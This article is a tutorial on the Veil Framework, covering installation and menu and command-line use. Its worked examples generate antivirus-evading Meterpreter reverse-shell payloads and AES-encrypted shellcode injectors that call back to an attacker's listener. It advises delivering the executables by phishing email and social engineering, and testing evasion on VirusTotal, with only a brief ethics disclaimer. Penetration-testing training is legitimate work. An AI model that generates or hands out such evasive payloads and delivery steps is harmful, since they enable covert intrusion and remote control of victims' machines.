Veil Framework: Generating Antivirus-Evading Payloads with Examples

Guide to the Veil Framework: Generating Antivirus-Evading Payloads with Examples

Introduction

The Veil Framework is a powerful, open-source tool designed for penetration testers and red teamers to generate payloads that bypass common antivirus (AV) solutions. Developed primarily by Chris Truncer and maintained under the Veil-Framework GitHub repository, Veil focuses on creating obfuscated and encrypted payloads, often integrated with Metasploit's Meterpreter. As of its latest version (3.1.X), Veil supports multiple tools like Evasion for payload generation and Ordnance for shellcode creation.

Veil is particularly useful in ethical hacking scenarios where testers need to simulate real-world attacks without triggering security alerts. It employs techniques such as code obfuscation, encryption (e.g., AES), and polymorphism to evade detection. Note that Veil-Evasion (an older module) is deprecated; users should stick to Veil 3.0+ for active support.

This article provides a detailed tutorial on installing, configuring, and using Veil, complete with practical examples. We'll cover key features, step-by-step payload generation, and tips for effective use. All examples are for educational purposes only—ensure you have permission before testing on any system.

Key Features of Veil

• Payload Generation: Creates executables or scripts that embed shellcode or connect directly to listeners like Meterpreter.
• AV Evasion: Uses languages like Python, Go, Ruby, and C to obfuscate payloads, with options for encryption and custom shellcode.
• Integration: Works seamlessly with Metasploit (msfvenom) and supports custom options for LHOST, LPORT, etc.
• Tools Included:
• Evasion: Main tool for generating evasive payloads.
• Ordnance: Generates shellcode independently, useful for custom injections.
• Cross-Platform Support: Officially for Kali Linux and Debian-based systems; compatible with Arch, Ubuntu, and others.
• Command-Line Flexibility: Supports switches for automation, e.g., ./Veil.py -p <payload> -o <output>.

Veil does not install additional packages during runtime and requires manual setup of dependencies like Wine, Python 3, Ruby, and Go.

System Requirements

• Operating Systems:
• Officially Supported: Kali Linux Rolling 2018.1+, Debian 8+.
• Likely Compatible: Arch Linux, Ubuntu 15.10+, Fedora 22+, Linux Mint, Parrot Security, Void Linux, Manjaro, BlackArch, Deepin 15+, Elementary.
• Hardware: An X server must be running (for GUI dependencies like Wine).
• Dependencies: Installed via setup script, including Wine (for Windows compilation), GoLang, Python, Ruby, and AutoIT.

Installation Guide

Veil can be installed via Kali's package manager or directly from GitHub. Superuser privileges (sudo) are required.

Method 1: Kali Linux Quick Install

1. Update your system:

text

sudo apt update

2. Install Veil:

text

sudo apt -y install veil

3. Run the setup script:

text

/usr/share/veil/config/setup.sh --force --silent

• --force: Overwrites previous installations.
• --silent: Automates the process without prompts.

Method 2: GitHub Clone Install

1. Install Git:

text

sudo apt-get -y install git

2. Clone the repository:

text

git clone https://github.com/Veil-Framework/Veil.git

3. Navigate to the directory:

text

cd Veil/

4. Run the setup script:

text

./config/setup.sh --force --silent

The script installs all dependencies, sets up Wine for Windows executables, and generates the config file /etc/veil/settings.py.

Troubleshooting Installation

• Config Issues: If no payloads load, run ./Veil.py --config or cd config/; ./update-config.py.
• Python Crypto Error: Edit setup.sh to replace python3-crypto with python3-cryptography (around line 285).
• Py2Exe vs. PyInstaller: Py2Exe is recommended for lower detection rates but requires manual Windows installation.
• Updates: Run ./Veil.py --update for framework updates.

After installation, launch Veil with ./Veil.py to access the main menu.

Usage Guide

Veil's interface is menu-driven but supports command-line arguments for automation.

Main Menu Overview

Upon launching:

text

$ ./Veil.py

===============================================================================

                             Veil | [Version]: 3.1.6

===============================================================================

      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

===============================================================================

 

Main Menu

 

  2 tools loaded

 

Available Tools:

 

  1)  Evasion

  2)  Ordnance

 

Available Commands:

 

  exit      Completely exit Veil

  info      Information on a specific tool

  list      List available tools

  options     Show Veil configuration

  update      Update Veil

  use     Use a specific tool

 

Veil>:

• Use list to view tools.
• Use use 1 for Evasion or use 2 for Ordnance.
• info <tool> for details.

Command-Line Options

Run ./Veil.py --help for full options:

• --tool <TOOL>: Specify tool (e.g., Evasion).
• -p <PAYLOAD>: Payload name (e.g., go/meterpreter/rev_tcp).
• -o <OUTPUT-NAME>: Base name for output files.
• -c OPTION=value: Custom options (e.g., LHOST=192.168.1.1).
• --msfvenom: Use Metasploit shellcode.
• --clean: Clean up temporary files.

Practical Examples

Here are step-by-step examples of generating payloads. All assume a Kali Linux setup and Metasploit integration.

Example 1: Basic Meterpreter Reverse TCP Payload (Interactive Mode)

1. Launch Veil: ./Veil.py
2. Select Evasion: use 1
3. List payloads: list (Shows options like python/meterpreter/rev_tcp, go/shellcode_inject/base64).
4. Use a payload: use go/meterpreter/rev_tcp (or number, e.g., 44).
5. Set options:

text

set LHOST 192.168.1.100

set LPORT 4444

6. Generate: generate
7. Name the payload: e.g., "basic_payload"
8. Output: Files saved to /var/lib/veil/output/compiled/basic_payload.exe and source in /var/lib/veil/output/source/basic_payload.go.

On the listener side, start Metasploit:

text

msfconsole -r /var/lib/veil/output/handlers/basic_payload_handler.rc

Deliver the .exe to the target (e.g., via phishing). When executed, it connects back without AV detection.

Example 2: Encrypted Shellcode Injection Payload (Command-Line Mode)

For advanced evasion using AES encryption:

text

./Veil.py -t Evasion -p python/shellcode_inject/aes_encrypt -o encrypted_payload -c LHOST=192.168.1.100 LPORT=4444 USE_PYHERION=Y

• USE_PYHERION Y: Adds extra obfuscation.
• This generates encrypted_payload.exe with VirtualAlloc injection.
• Use Ordnance for custom shellcode: Select use 2 in Veil, choose rev_http, set options, and generate.

Test: Upload to VirusTotal or a target with AV; it often evades detection.

Example 3: Using Ordnance for Shellcode

1. In Veil: use 2 (Ordnance).
2. List payloads: list (e.g., rev_tcp, rev_http).
3. Use: use rev_tcp
4. Set: set LHOST 192.168.1.100, set LPORT 4444
5. Generate: generate
6. Output: Shellcode in hex format (e.g., \xfc\xe8\x82...).
7. Integrate into Evasion: When prompted in a shellcode_inject payload, paste this instead of msfvenom.

Example 4: Bypassing AV in a Lab Scenario

• Generate: python/meterpreter/rev_https (uses HTTPS for encrypted callback).
• Set LHOST/LPORT.
• Deliver via email attachment.
• Listener: Use the generated .rc file in msfconsole.
• Result: Gains Meterpreter session; test against AV like Avast or Windows Defender.

Best Practices and Tips

• Ethics and Legality: Use only in authorized environments (e.g., bug bounties, labs). Misuse is illegal.
• Testing: Always scan generated payloads with tools like VirusTotal to verify evasion.
• Customization: Experiment with languages (Go for lower detection) and encoders (-e ENCODER).
• Integration: Combine with social engineering for delivery.
• Limitations: AV vendors update signatures; Veil may not evade all (e.g., behavior-based detection).
• Alternatives: If Veil fails, try msfvenom with custom encoders or tools like TheFatRat.
• Resources:
• Official GitHub: https://github.com/Veil-Framework/Veil
• Tutorials: Hackers Arise, PortSwigger Web Security Academy.
• Community: Follow @VeilFramework on X (Twitter).

Conclusion

The Veil Framework remains a cornerstone for red teaming, enabling the creation of sophisticated, undetectable payloads. By mastering its tools like Evasion and Ordnance, ethical hackers can better assess and strengthen defenses. Remember, with great power comes great responsibility—always prioritize ethical use.

 

Author: Engr. M A Rahsid Rony

Date: September 06, 2025 For updates, visit the official Veil website: https://www.veil-framework.com/